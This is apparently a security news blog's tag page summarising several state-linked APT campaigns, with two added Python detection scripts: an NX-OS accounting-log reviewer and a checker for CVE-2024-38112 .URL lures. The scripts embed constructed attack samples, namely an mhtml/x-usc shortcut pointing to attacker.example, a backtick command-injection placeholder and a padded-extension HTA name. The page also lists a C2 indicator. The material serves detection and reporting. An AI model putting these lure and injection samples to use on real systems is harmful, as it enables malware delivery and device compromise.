
Admiration Tech News


Tag: malware

Russia-linked APT Nobelium targets French diplomatic entities

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

French information security agency ANSSI reported that Russia-linked threat actor Nobelium is behind a series of cyber attacks that targeted French diplomatic entities.

The French information security agency ANSSI reported that the Russia-linked APT Nobelium targeted French diplomatic entities. Although the French agency linked the attacks to the cyberespionage group Nobelium (aka APT29, SVR group, Cozy Bear, Midnight Blizzard, BlueBravo, and The Dukes), ANSSI separates this activity into distinct threat clusters, including a group named Dark Halo, which was responsible for the 2020 SolarWinds attack.

Active since at least October 2020, Nobelium is deployed against high-value targets, most likely for espionage purposes. Western diplomatic entities, such as embassies and Ministries of Foreign Affairs, account for the majority of its known victims. Several IT companies have also reported being targeted by Nobelium's operators in late 2023 and 2024.

The report published by ANSSI is based upon elements collected by the French agency, evidence shared by its national partners (known as C4 members), and publicly available reports. The document warns of phishing campaigns conducted by Nobelium against French public and diplomatic entities aiming at gathering strategic intelligence.

“Nobelium is characterized by the use of specific codes, tactics, techniques and procedures. Most of Nobelium campaigns against diplomatic entities use compromised legitimate email accounts belonging to diplomatic staff, and conduct phishing campaigns against diplomatic institutions, embassies and consulates.” reads the report published by ANSSI. “These activities are also publicly described as a campaign called ‘Diplomatic Orbiter’.”

Attackers forge lure documents to target diplomatic staff, attempting to deliver their custom loaders, which in turn drop public post-exploitation tools such as Cobalt Strike or Brute Ratel C4. These tools allow the attackers to access the victim's network, move laterally, drop additional payloads, maintain persistence, and exfiltrate valuable intelligence.


“French public organisations have been targeted several times by phishing emails sent from foreign institutions previously compromised by Nobelium’s operators.” continues the report. “From February to May 2021, Nobelium operators conducted several phishing campaigns exploiting compromised email accounts belonging to the French Ministry of Culture and the National Agency for Territorial Cohesion (ANCT), sending an attachment called ‘Strategic Review’.”

In March 2022, a European embassy in South Africa received a phishing email that impersonated a French embassy, announcing its closure after a terrorist attack. The attackers sent the email from the compromised account of a French diplomat. In April and May 2022, Nobelium phishing messages reached dozens of email addresses at the French Ministry of Foreign Affairs. The threat actors used themes such as the closure of a Ukrainian embassy or a meeting with a Portuguese ambassador.

In May 2023, Nobelium targeted several European embassies in Kyiv, including the French embassy, with a phishing campaign involving an email about a “Diplomatic car for sale.” The ANSSI also reported a failed attempt to compromise the French Embassy in Romania.

“ANSSI has observed a high level of activities linked to Nobelium against the recent backdrop of geopolitical tensions, especially in Europe, in relation to Russia’s aggression against Ukraine. Nobelium’s activities against government and diplomatic entities represent a national security concern and endanger French and European diplomatic interests. The targeting of IT and cybersecurity entities for espionage purposes by Nobelium operators potentially strengthens their offensive capabilities and the threat they represent.” concludes the report that also provides indicators of compromise. “Nobelium’s techniques, tactics, and procedures remain mainly constant over time.”

Posted in Cyber Attacks. Tagged: Cyber Attacks, Data Security, malware, Ransomware, Spyware, vulnerability

Russia-linked group APT29 likely breached TeamViewer’s corporate network

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

A Russia-linked APT group, reportedly APT29, is suspected to be behind the hack of TeamViewer's corporate network.

TeamViewer discovered that a threat actor has breached its corporate network and some reports attribute the intrusion to the Russia-linked APT group APT29 (aka SVR group, BlueBravo, Cozy Bear, Nobelium, Midnight Blizzard, and The Dukes).

The unauthorized access to the company's IT infrastructure occurred on June 26, 2024; the threat actors used the credentials of a standard employee account within its corporate IT environment.

Upon detecting suspicious activity by this account, the company immediately initiated incident response measures.

“A comprehensive taskforce consisting of TeamViewer’s security team together with globally leading cyber security experts has worked 24/7 on investigating the incident with all means available. We are in constant exchange with additional threat intelligence providers and relevant authorities to inform the investigation.” reads the statement published by the company.

“Current findings of the investigation point to an attack on Wednesday, June 26, tied to credentials of a standard employee account within our Corporate IT environment. Based on continuous security monitoring, our teams identified suspicious behavior of this account and immediately put incident response measures into action. Together with our external incident response support, we currently attribute this activity to the threat actor known as APT29 / Midnight Blizzard. Based on current findings of the investigation, the attack was contained within the Corporate IT environment and there is no evidence that the threat actor gained access to our product environment or customer data.”

An update published by TeamViewer states that findings confirmed that the attack on its infrastructure was limited to its internal corporate IT environment and did not affect the product environment, connectivity platform, or any customer data.

The popular Ars Technica reporter Dan Goodin reported that an alert issued by security firm NCC Group reports a “significant compromise of the TeamViewer remote access and support platform by an APT group.”

In May 2019, the German newspaper Der Spiegel revealed that the German software company behind TeamViewer had been compromised in 2016 by Chinese hackers.

According to the media outlet, Chinese state-sponsored hackers used the Winnti trojan malware to infect the systems of the Company.

The Winnti group was first spotted by Kaspersky in 2013; according to the researchers, the nation-state actor has been active since at least 2007.

The gang is financially motivated and has mostly been involved in cyber espionage campaigns. The hackers were known for targeting companies in the online gaming industry; the majority of their victims are located in Southeast Asia.

The Winnti cyberespionage group is known for its ability in targeting supply chains of legitimate software to spread malware.

According to the company, it was targeted by the hackers in autumn 2016; its experts detected the suspicious activity and quickly blocked it to prevent major damage.

A TeamViewer spokesperson said the company investigated the intrusion attempt but found no evidence that customer data or other sensitive data had been exposed.

Der Spiegel pointed out that TeamViewer did not disclose the security breach to the public.

“In autumn 2016, TeamViewer was target of a cyber-attack. Our systems detected the suspicious activities in time to prevent any major damage. An expert team of internal and external cyber security researchers, working together closely with the responsible authorities, successfully fended off the attack and with all available means of IT forensics found no evidence that customer data or other sensitive information had been stolen, that customer computer systems had been infected or that the TeamViewer source code had been manipulated, stolen or misused in any other way.” said company spokesman.

“Out of an abundance of caution, TeamViewer conducted a comprehensive audit of its security architecture and IT infrastructure subsequently and further strengthened it with appropriate measures.”

At the time, the company published a statement denying that it had been breached by hackers:

“Göppingen/Germany, May 23, 2016. A recent article warns, “TeamViewer users have had their bank accounts emptied by hackers gaining full-system access”. TeamViewer is appalled by any criminal activity; however, the source of the problem, according to our research, is careless use, not a potential security breach on TeamViewer’s side.” wrote the company.

Only in 2019 did the company admit it had been breached in 2016.

China-linked APT exploited Cisco NX-OS zero-day to deploy custom malware

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Cisco fixed an actively exploited NX-OS zero-day, the flaw was exploited to install previously unknown malware as root on vulnerable switches.

Cisco addressed an NX-OS zero-day, tracked as CVE-2024-20399 (CVSS score of 6.0), that the China-linked group Velvet Ant exploited to deploy previously unknown malware as root on vulnerable switches.

The flaw resides in the CLI of Cisco NX-OS Software; an authenticated, local attacker can exploit it to execute arbitrary commands as root on the underlying operating system of an affected device.

“This vulnerability is due to insufficient validation of arguments that are passed to specific configuration CLI commands. An attacker could exploit this vulnerability by including crafted input as the argument of an affected configuration CLI command.” reads the advisory published by Cisco. “A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of root.”

The IT giant pointed out that only attackers with Administrator credentials can successfully exploit this vulnerability on a Cisco NX-OS device.

Cybersecurity firm Sygnia observed the attacks in April 2024 and reported to the Cisco Product Security Incident Response Team (PSIRT) that the issue was being actively exploited in the wild.

“Sygnia identified that CVE-2024-20399 was exploited in the wild by a China-nexus threat group as a ‘zero-day’ and shared the details of the vulnerability with Cisco. By exploiting this vulnerability, a threat group – dubbed ‘Velvet Ant’ – successfully executed commands on the underlying operating system of Cisco Nexus devices.” reads the report published by Sygnia. “This exploitation led to the execution of a previously unknown custom malware that allowed the threat group to remotely connect to compromised Cisco Nexus devices, upload additional files, and execute code on the devices.“

The vulnerability impacts the following devices:

  • MDS 9000 Series Multilayer Switches (CSCwj97007)
  • Nexus 3000 Series Switches (CSCwj97009)
  • Nexus 5500 Platform Switches (CSCwj97011)
  • Nexus 5600 Platform Switches (CSCwj97011)
  • Nexus 6000 Series Switches (CSCwj97011)
  • Nexus 7000 Series Switches (CSCwj94682) *
  • Nexus 9000 Series Switches in standalone NX-OS mode (CSCwj97009)

Cisco recommends that customers monitor the use of credentials for the administrative users network-admin and vdc-admin.

Cisco provides the Cisco Software Checker to help customers determine if their devices are vulnerable to this flaw.
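One practical way to act on that monitoring recommendation is to review the switch's accounting log for logins by the administrative accounts from unexpected hosts, and for configuration commands whose arguments carry shell metacharacters, since the advisory describes crafted arguments to configuration CLI commands as the trigger. The following Python script is an added example, not Cisco's or Sygnia's code: the log-line shape is modelled on NX-OS `show accounting log` output, the sample lines, the trusted management hosts and the watched account names are constructed, and the crafted-argument line is a placeholder because the page does not name the affected command or the payload.

```python
"""Heuristic review of NX-OS-style accounting log lines (added example, constructed data)."""
import re
from dataclasses import dataclass

# Assumed line shape, modelled on NX-OS `show accounting log` output:
#   <timestamp>:type=<start|stop|update>:id=<source>@<tty>:user=<account>:cmd=<command text>
LINE_RE = re.compile(
    r"^(?P<ts>.+?):type=(?P<type>\w+):id=(?P<src>[^@:]+)@(?P<tty>[^:]+):"
    r"user=(?P<user>[^:]*):cmd=(?P<cmd>.*)$"
)

# Accounts to watch. network-admin and vdc-admin are roles on NX-OS; add every local
# account that holds them (the default "admin" account does). Assumed for the example.
WATCHED_USERS = {"admin", "network-admin", "vdc-admin"}
# Hypothetical allow-list of management hosts for this environment.
TRUSTED_SOURCES = {"10.10.0.5", "10.10.0.6"}
# NX-OS joins the commands of one session line with " ; ", so ';' is not treated as
# suspicious; the remaining characters have no legitimate place in a config argument.
SHELL_META = re.compile(r"[|&`$<>]")


@dataclass
class Finding:
    ts: str
    user: str
    src: str
    reason: str
    cmd: str


def parse_line(line):
    """Split one accounting-log line into its fields, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def suspicious_arguments(cmd):
    """Return the sub-commands of a session line whose arguments contain shell metacharacters."""
    return [part for part in cmd.split(" ; ") if SHELL_META.search(part)]


def review(lines):
    """Return findings for watched-account logins from untrusted hosts and crafted arguments."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["user"] in WATCHED_USERS and rec["src"] not in TRUSTED_SOURCES:
            findings.append(Finding(rec["ts"], rec["user"], rec["src"],
                                    "admin login from untrusted source", rec["cmd"]))
        if rec["type"] == "update":
            for part in suspicious_arguments(rec["cmd"]):
                findings.append(Finding(rec["ts"], rec["user"], rec["src"],
                                        "shell metacharacters in CLI argument", part))
    return findings


# Constructed sample: two lines from a trusted host, two from an unknown address.
# The last line's argument is a placeholder; the real affected command is not on the page.
SAMPLE_LOG = [
    "Mon Jul  1 09:58:11 2024:type=start:id=10.10.0.5@pts/0:user=admin:cmd=",
    "Mon Jul  1 09:59:02 2024:type=update:id=10.10.0.5@pts/0:user=admin:cmd="
    "configure terminal ; interface ethernet1/1 ; description uplink (SUCCESS)",
    "Mon Jul  1 22:14:37 2024:type=start:id=192.0.2.77@pts/1:user=admin:cmd=",
    "Mon Jul  1 22:15:09 2024:type=update:id=192.0.2.77@pts/1:user=admin:cmd="
    "configure terminal ; placeholder-config-command arg1 `id` (SUCCESS)",
]

if __name__ == "__main__":
    for f in review(SAMPLE_LOG):
        print(f"{f.ts}  {f.user}@{f.src}  {f.reason}: {f.cmd}")
```

Run against an export of `show accounting log`, the script flags the two lines from 192.0.2.77 and the sub-command containing backticks; tune the metacharacter set to the configuration commands your platform legitimately accepts before relying on it.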

In late 2023, Sygnia researchers responded to an incident suffered by a large organization that they attributed to the same China-linked threat actor ‘Velvet Ant.’

The cyberspies deployed custom malware on F5 BIG-IP appliances to gain persistent access to the internal network of the target organization and steal sensitive data.


Multiple cybersecurity agencies warn of China-linked APT40's capabilities

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Multiple cybersecurity agencies released a joint advisory warning about the China-linked group APT40's capability to rapidly exploit disclosed security flaws.

Cybersecurity agencies from Australia, Canada, Germany, Japan, New Zealand, South Korea, the U.K., and the U.S. released a joint advisory warning about the China-linked group APT40 (aka TEMP.Periscope, TEMP.Jumper, Bronze Mohawk, Gingham Typhoon, ISLANDDREAMS, Kryptonite Panda, Red Ladon, TA423, and Leviathan) and its capability to rapidly exploit disclosed flaws.

The China-linked group was able to exploit vulnerabilities within hours or days of the public disclosure.

APT40 has previously targeted organizations in countries like Australia and the United States. The group is able to rapidly adapt vulnerability proofs of concept (POCs) for their operations. They identify new exploits in widely used public software, such as Log4J, Atlassian Confluence, and Microsoft Exchange, to target the associated infrastructure.

“APT 40 has previously targeted organizations in various countries, including Australia and the United States. Notably, APT 40 possesses the ability to quickly transform and adapt vulnerability proofs of concept (POCs) for targeting, reconnaissance, and exploitation operations.” reads the advisory. “APT 40 identifies new exploits within widely used public software such as Log4J, Atlassian Confluence and Microsoft Exchange to target the infrastructure of the associated vulnerability.“

In July 2021, the U.S. Justice Department (DoJ) indicted four members of the cyber espionage group APT40 (aka TEMP.Periscope, TEMP.Jumper, and Leviathan) for hacking dozens of government organizations, private businesses, and universities around the world between 2011 and 2018.

The APT40 group has been active since at least 2013 and focuses on countries important to China's Belt and Road Initiative (e.g. Cambodia, Belgium, Germany, Hong Kong, the Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom).

The group appears to be focused on supporting the naval modernization efforts of the Government of Beijing. Threat actors target engineering, transportation, and defense sectors, experts observed a specific interest in maritime technologies.

The cyberspies also targeted research centres and universities involved in naval research with the intent to access advanced technology to push the growth of the Chinese naval industry. The list of victims of the APT40 group also includes organizations with operations in Southeast Asia or involved in South China Sea disputes.

Three of the defendants are said to be officers in a provincial arm of the MSS and one was an employee of a front company that was used to obfuscate the government’s role in the hacking campaigns.

“APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017.” continues the joint advisory. “APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release.”


APT40 prefers exploiting vulnerable public-facing infrastructure over other techniques such as phishing, and prioritizes obtaining valid credentials for follow-on activity. The group often relies on web shells to maintain persistence early in an intrusion. Because persistence is established so early, it is likely to be observed in every case, regardless of the level of compromise or the actions that follow.

In the past, APT40 was observed using compromised Australian websites as C2 servers; the group has since evolved this technique.

“APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements.” continues the report.

Many of the compromised SOHO devices are end-of-life or unpatched and can be easily hijacked using N-day exploits. Compromised SOHO (small office/home office) devices give attackers a platform from which to launch attacks that blend in with legitimate traffic.

The report provides details about the tactics, techniques, and procedures associated with the group, along with detection and mitigation recommendations.

Void Banshee exploits CVE-2024-38112 zero-day to spread malware

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Void Banshee APT group exploited the Windows zero-day CVE-2024-38112 to execute code via the disabled Internet Explorer.

An APT group tracked as Void Banshee was spotted exploiting the Windows zero-day CVE-2024-38112 (CVSS score of 7.5) to execute code through the disabled Internet Explorer.

The vulnerability is a Windows MSHTML Platform Spoofing Vulnerability. Successful exploitation requires the attacker to take additional actions to prepare the target environment before exploitation; in practice, the attacker sends the victim a malicious file that the victim must open.

Trend Micro researchers discovered that the flaw was actively exploited in the wild in May and reported it to Microsoft which addressed the zero-day with the July 2024 Patch Tuesday security updates.

Void Banshee was observed exploiting the CVE-2024-38112 flaw to drop the Atlantida info-stealer on the victims’ machines. The malware allows operators to gather system information and steal sensitive data, such as passwords and cookies, from multiple applications.

In the group's attack chain, Void Banshee attempts to trick victims into opening zip archives containing malicious files disguised as book PDFs. The archives are disseminated via cloud-sharing websites, Discord servers, online libraries, and other channels. The APT group focuses on North America, Europe, and Southeast Asia.

“This zero-day attack is a prime example of how unsupported Windows relics are an overlooked attack surface that can still be exploited by threat actors to infect unsuspecting users with ransomware, backdoors, or as a conduit for other kinds of malware.” states Trend Micro.

Void Banshee abused the disabled Internet Explorer process to run HTML Application (HTA) files via specially crafted .URL files that use the MHTML protocol handler and the x-usc! directive. This technique resembles the exploitation of CVE-2021-40444, another MSHTML flaw that was exploited in zero-day attacks. The researchers warn that the method is particularly concerning because Internet Explorer no longer receives updates or security fixes.

“In this attack, CVE-2024-38112 was used as a zero-day to redirect a victim by opening and using the system-disabled IE to a compromised website which hosted a malicious HTML Application (HTA)” states the report. “In the URL parameter of the internet shortcut file, we can see that Void Banshee specifically crafted this URL string using the MHTML protocol handler along with the x-usc! directive. This logic string opens the URL target in the native Internet Explorer through the iexplore.exe process.”


Attackers used the internet shortcut file to direct the victims to an attacker-controlled domain where an HTML file downloads the HTA stage of the infection chain. The researchers noticed that Void Banshee uses this HTML file to control the window view size of Internet Explorer, hiding browser information and hiding the download of the next infection stage from the victim.

By default, IE prompts users to open or save the HTML application, but the APT group disguised the HTA file as a PDF by adding spaces to the file extension. Upon running the HTA file, a series of scripts is executed, along with the LoadToBadXml .NET trojan loader, the Donut shellcode, and the Atlantida stealer.
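As an added example (not Trend Micro's code), the following Python checks illustrate the two file-level tells described above: a .URL internet shortcut whose URL= value uses the mhtml: handler together with an !x-usc: directive, and a filename whose real extension is hidden behind a run of spaces. The sample shortcut contents, hostnames and file names are constructed for the example and are not indicators from the campaign.

```python
"""Detect the .URL / padded-extension lures described for CVE-2024-38112 (added example)."""
import configparser
import re

# The combination the report describes: URL=mhtml:<target>!x-usc:<target>.
MHTML_XUSC = re.compile(r"^\s*mhtml:.*!x-usc:", re.IGNORECASE)
# Executable or script extensions that should never sit behind a padded "document" name.
RISKY_EXTENSIONS = {"hta", "url", "lnk", "exe", "js", "vbs", "cmd", "bat", "scr"}


def parse_url_file(text):
    """Return the URL= value of an [InternetShortcut] file, or None if the text is not one."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            return cp[section].get("URL")
    return None


def is_mhtml_xusc(text):
    """True when the shortcut forces the MHTML handler with an x-usc directive."""
    url = parse_url_file(text)
    return bool(url) and MHTML_XUSC.search(url) is not None


def has_padded_extension(filename, min_spaces=3):
    """True for names like 'Book.pdf<many spaces>.hta' that hide a risky real extension."""
    m = re.match(r"^(.*\.\w{2,4})( {%d,})\.(\w+)$" % min_spaces, filename)
    return m is not None and m.group(3).lower() in RISKY_EXTENSIONS


def classify(filename, text):
    """Combine both checks for one extracted archive member; returns the reasons to flag it."""
    reasons = []
    if is_mhtml_xusc(text):
        reasons.append("mhtml handler with x-usc directive")
    if has_padded_extension(filename):
        reasons.append("extension hidden behind space padding")
    return reasons


# Constructed samples; the hostnames and names are placeholders, not campaign indicators.
MALICIOUS_URL_FILE = """[InternetShortcut]
URL=mhtml:http://attacker.example/books/Book.pdf!x-usc:http://attacker.example/books/Book.pdf
IconFile=C:\\Program Files\\Adobe\\Acrobat\\Acrobat.exe
IconIndex=0
"""
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.org/reading-list
"""
PADDED_NAME = "Book.pdf" + " " * 40 + ".hta"

if __name__ == "__main__":
    print("Book.pdf.url ->", classify("Book.pdf.url", MALICIOUS_URL_FILE))
    print("benign.url   ->", classify("benign.url", BENIGN_URL_FILE))
    print(repr(PADDED_NAME), "->", classify(PADDED_NAME, "<html></html>"))
```

Point `classify` at each member of an incoming archive before it is opened; a shortcut that matches the first check is worth blocking outright, since there is no legitimate reason for a document link to route through the MHTML handler into Internet Explorer.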

“In this campaign, we have observed that even though users may no longer be able to access IE, threat actors can still exploit lingering Windows relics like IE on their machine to infect users and organizations with ransomware, backdoors, or as a proxy to execute other strains of malware.” Trend Micro concludes. “The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users.”


China-linked APT group uses new Macma macOS backdoor version

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

The China-linked APT group Daggerfly (aka Evasive Panda, Bronze Highland) has been spotted using an updated version of the macOS backdoor Macma.

The China-linked APT group Daggerfly (aka Evasive Panda or Bronze Highland) has significantly updated its malware arsenal, adding a new malware family based on the MgBot framework and an updated Macma macOS backdoor.

“The Daggerfly (aka Evasive Panda, Bronze Highland) espionage group has extensively updated its toolset, introducing several new versions of its malware, most likely in response to exposure of older variants.” reads the report. “The new tooling was deployed in a number of recent attacks against organizations in Taiwan and a U.S. NGO based in China, which indicates the group also engages in internal espionage. In the attack on this organization, the attackers exploited a vulnerability in an Apache HTTP server to deliver their MgBot malware.“

The APT group was spotted using the malware families in attacks against Taiwanese organizations and a U.S. NGO in China. The attackers exploited an Apache HTTP server vulnerability to deliver their MgBot malware.

Daggerfly has been active for at least a decade, the group is known for the use of the custom MgBot malware framework. In 2023, Symantec identified a Daggerfly intrusion at an African telecom operator, using new MgBot plugins. This highlights the group’s ongoing evolution in cyber espionage tactics.

The Macma macOS backdoor was first detailed by Google in 2021 and has been used since at least 2019. At the time of discovery, threat actors employed the malware in watering hole attacks involving compromised websites in Hong Kong. The watering hole attacks used exploits for iOS and macOS devices. Attackers exploited the privilege escalation vulnerability CVE-2021-30869 to install Macma on macOS devices.

Macma is a modular backdoor that supports multiple functionalities, including device fingerprinting, executing commands, screen capture, keylogging, audio capture, uploading and downloading files.

Although Macma has been widely used in cyber operations by nation-state actors, it had not been linked to a particular group. Symantec has now found evidence suggesting it is part of the Daggerfly toolkit: two variants of the Macma backdoor connected to a C2 server (103.243.212[.]98) that was also used by an MgBot dropper.

In addition to this shared infrastructure, Macma and other malware in Daggerfly's arsenal, including MgBot, all contain code from a single shared library or framework. Elements of this library have been used to build Windows, macOS, Linux, and Android threats. The functionality provided by this library includes:

  • Threading and synchronization primitives
  • Event notifications and timers
  • Data marshaling
  • Platform-independent abstractions (e.g. time)

The new variants used by Daggerfly implement the following additions/improvements:

  • New logic to collect a file system listing, with the new code based on Tree, a publicly available Linux/Unix utility
  • Modified code in the AudioRecorderHelper feature
  • Additional parametrisation
  • Additional debug logging
  • Addition of a new file (param2.ini) to set options to adjust screenshot size and aspect ratio

The experts also observed another malware, tracked as Suzafk (aka ‘NetMM’, Nightdoor), in the group toolkit that ESET researchers linked to Evasive Panda in March.

“Suzafk is a multi-staged backdoor capable of using TCP or OneDrive for C&C. The malware contained the following configuration, indicating the functionality to connect to OneDrive is in development or present in other variants of the malware.” continues the report.

The backdoor includes code from the al-khaser project, a public repository of anti-analysis techniques that detect virtual machines, sandboxes, and malware analysis environments.

The malware can also execute commands for network and system monitoring, such as ‘ipconfig,’ ‘systeminfo,’ ‘tasklist,’ and ‘netstat.’

“The [Daggerfly] group can create versions of its tools targeting most major operating system platforms.” concludes the report. “In addition to the tools documented here, Symantec has seen evidence of the ability to Trojanize Android APKs, SMS interception tools, DNS request interception tools, and even malware families targeting Solaris OS. Daggerfly appears to be capable of responding to exposure by quickly updating its toolset to continue its espionage activities with minimal disruption.”


Belarus-linked APT Ghostwriter targeted Ukraine with PicassoLoader malware

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Belarus-linked APT group GhostWriter targeted Ukrainian organizations with a malware family known as PicassoLoader, used to deliver various malicious payloads.

The Ukrainian Government's Computer Emergency Response Team (CERT-UA) reported a surge in activity associated with the APT group UAC-0057 (aka GhostWriter) between July 12 and 18, 2024. The threat actors distributed documents containing macros designed to deploy the PICASSOLOADER malware on victim computers, which then delivered the post-exploitation tool Cobalt Strike Beacon.

The attackers used bait documents related to local government reform (USAID/DAI “HOVERLA” project), taxation, and financial-economic metrics (“oborona.rar,” “66_oborona_PURGED.xls,” “trix.xls,” “equipment_survey_regions_.xls,” “accounts.xls,” “spreadsheet.xls,” “attachment.xls,” “Податок_2024.xls”).

“Based on this, it can be inferred that UAC-0057 might have targeted both project office specialists and their counterparts among the employees of relevant local government bodies in Ukraine.” reads the report published by CERT-UA.


The campaign was likely part of a broader cyber espionage activity against the Ukrainian government.

In November 2021, Mandiant Threat Intelligence researchers linked the Ghostwriter disinformation campaign (aka UNC1151) to the government of Belarus.

In August 2020, security experts from FireEye uncovered a disinformation campaign aimed at discrediting NATO by spreading fake news content on compromised news websites.

According to FireEye, the campaign tracked as GhostWriter, has been ongoing since at least March 2017 and is aligned with Russian security interests.

Unlike other disinformation campaigns, GhostWriter doesn’t spread through social networks, instead, threat actors behind this campaign abused compromised content management systems (CMS) of news websites or spoofed email accounts to disseminate fake news.

The operators behind Ghostwriter targeted Belarusian entities before the 2020 elections, some of the individuals (representatives of the Belarusian opposition) targeted by the nation-state actor were later arrested by the Belarusian government.


China-linked APT41 breached Taiwanese research institute

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

China-linked group APT41 breached a Taiwanese government-affiliated research institute using ShadowPad and Cobalt Strike.

Cisco Talos researchers reported that the China-linked group compromised a Taiwanese government-affiliated research institute. The experts attributed the attack with medium confidence to the APT41 group.

The campaign started as early as July 2023 and threat actors delivered the ShadowPad malware, Cobalt Strike, and other post-exploitation tools.

The ShadowPad sample employed in this campaign abused an outdated, vulnerable version of a Microsoft Office IME binary as its loader; that loader in turn loads a customized second-stage loader that launches the payload.

“Cisco Talos assesses with medium confidence that this campaign is carried out by APT41, alleged by the U.S. government to be comprised of Chinese nationals. This assessment is based primarily on overlaps in tactics, techniques and procedures (TTPs), infrastructure and malware families used exclusively by Chinese APT groups.” reads the report published by Cisco Talos. “Talos’ analyses of the malware loaders used in this attack reveal that these are ShadowPad loaders. However, Talos has been unable to retrieve the final ShadowPad payloads used by the attackers.”

ShadowPad is a modular remote access trojan (RAT) sold exclusively to Chinese hacking groups. It has been publicly linked to APT41, a group believed to operate from Chengdu, China, and has also been used by other Chinese groups such as Mustang Panda and the Tonto Team.

The researchers were not able to determine the initial attack vector. The attackers compromised three hosts in the targeted environment and exfiltrated some documents from the network. 

Attackers used a web shell to maintain persistence and drop additional payloads like ShadowPad and Cobalt Strike.

The attackers used a unique Cobalt Strike loader written in GoLang to bypass Windows Defender’s detection. This loader, derived from an anti-AV tool called CS-Avoid-Killing found on GitHub and written in Simplified Chinese, is promoted in various Chinese hacking forums and tutorials. The presence of Simplified Chinese file and directory paths suggests that the threat actors who created the loader are proficient in the language.

Attackers were also observed running PowerShell commands to execute scripts that run the ShadowPad malware directly in memory and fetch Cobalt Strike from the C2 server.

“During our investigation of this campaign, we encountered two distinct iterations of ShadowPad. While both iterations utilized the same sideloading technique, they each exploited different vulnerable legitimate binaries to initiate the ShadowPad loader.” continues the report. “The initial variant of the ShadowPad loader had been previously discussed in 2020, and some vendors had referred to it as ‘ScatterBee’. Its technical structure and the names of its multiple components have remained consistent with earlier reports. The more recent variant of the ShadowPad loader targeted an outdated and susceptible version of the Microsoft Office IME imecmnt.exe binary, which is over 13 years old.”

Talos also discovered that APT41 created a custom loader to inject a proof-of-concept for CVE-2018-0824 directly into memory. The threat actors used a remote code execution vulnerability to achieve local privilege escalation.

“During the compromise the threat actor attempts to exploit CVE-2018-0824, with a tool called UnmarshalPwn, which we will detail in the sections below.” continues the report. “The malicious actor is careful, in an attempt to avoid detection, during its activity executes “quser” which, when using RDP allows it to see who else is logged on the system. Hence the actor can stop its activity if any other user is on the system. Cisco Talos also noticed that once the backdoors are deployed the malicious actor will delete the webshell and guest account that allowed the initial access.”

By analyzing artifacts from this campaign, the researchers identified samples and infrastructure potentially used by the same threat actors in other campaigns. Sharing these findings could help the community make connections and support further investigations.

Talos released Indicators of Compromise for this campaign on their GitHub repository.


North Korea-linked hackers target construction and machinery sectors with watering hole and supply chain attacks

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

South Korea’s National Cyber Security Center (NCSC) reported that North Korea-linked hackers hijacked VPN software updates to deploy malware.

South Korea’s national security and intelligence agencies, including the National Intelligence Service, the Prosecutor’s Office, the Police Agency, the Military Intelligence Command, and the Cyber Operations Command, have issued a joint cybersecurity advisory warning that North Korea-linked hackers exploited VPN software updates to install malware on target networks.

According to the South Korean authorities, Pyongyang’s goal is to steal intellectual property and trade secrets from the South.

North Korea-linked hacking groups are targeting South Korea’s construction and machinery industries. The advisory provides details on the tactics, techniques, and procedures (TTPs) employed by the attackers, as well as indicators of compromise (IoCs) for these attacks.

“Following the official announcement of the “Local Development 20×10 Policy” by Kim Jong-un at the 14th Supreme People’s Assembly on January 15 this year, North Korea has been pushing for the construction of modern industrial plants in 20 cities and counties annually. North Korean hacking organizations are also intensifying their efforts to support this policy.” reads the advisory. “It is suspected that North Korean hackers are stealing data from South Korea’s construction, machinery, and urban development sectors to support their industrial plant construction and local development plans.”

The North Korean APT groups Kimsuky and Andariel, both linked to the Reconnaissance General Bureau, are the main hacking groups involved. Their simultaneous and targeted attacks on specific sectors are considered unusual, and experts note that they require careful preparation.

In January 2024, the Kimsuky APT group was spotted distributing malware through the website of a construction industry association in South Korea. The malware was concealed within security authentication software used during website login. The attack aimed at infecting PCs belonging to personnel from local governments, public institutions, and construction companies who accessed the site. This attack combined a “supply chain attack,” which involved tampering with legitimate distribution channels, with a “watering hole attack,” targeting websites frequently visited by construction and design professionals.

“When the tampered security authentication software installation file is executed, malware in the form of a DLL is run in the %APPDATA% directory, along with legitimate programs. This malware operates in the background to steal information, making it difficult for users to notice malicious activities. The malware, written in Go, is identified by some security firms as ‘TrollAgent’.” reads the advisory. “The malware has functionalities to collect system information, capture user screens, and gather information stored in browsers (credentials, cookies, bookmarks, history). It can also steal GPKI certificates, SSH keys, Sticky Notes, and FileZilla information from the infected PC.”


Another case detailed by the researchers took place in April 2024, when the Andariel hacking group exploited vulnerabilities in domestic VPN and server security software to distribute remote control malware, DoraRAT, to construction and machinery companies. The attackers manipulated the VPN client-server communication protocol to disguise malicious update files as legitimate ones. The compromised VPN client mistakenly accepted these files, leading to the execution of DoraRAT.

